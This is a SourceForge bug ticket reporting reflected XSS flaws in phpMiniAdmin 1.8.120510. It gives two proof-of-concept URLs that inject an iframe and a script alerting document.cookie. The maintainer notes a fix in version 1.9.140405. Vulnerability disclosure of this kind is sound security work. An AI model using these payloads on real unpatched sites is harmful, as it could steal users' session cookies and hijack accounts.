#13 xss

v1.0 (example)
closed-fixed
nobody
None
5
2014-04-05
2013-01-22
Raul DIaz
No

phpMiniAdmin 1.8.120510 Multiple xss by :Dshellnoi_Unix
#P.O.C#
http://\[ip]/phpminiadmin.php?XSS=07c0922BDE0aaa&db=information_schema&q=SHOW+TABLE+STATUS+%3Ciframe%20src=%22http://xssed.com%22%3E

http://\[ip]/phpminiadmin.php?XSS=07c0922BDE0aaa&refresh=&p=&db=<script>alert(document.cookie)</script>&q=
#proof
http://www.freeimagehosting.net/cap87

Discussion

  • Oleg Savchuk

    Oleg Savchuk - 2014-04-05
    • status: open --> closed-fixed
    • Group: --> v1.0 (example)
     
  • Oleg Savchuk

    Oleg Savchuk - 2014-04-05

    fixed in version 1.9.140405

     

Log in to post a comment.

Get latest updates about Open Source Projects, Conferences and News.

Sign up for the SourceForge newsletter:





No, thanks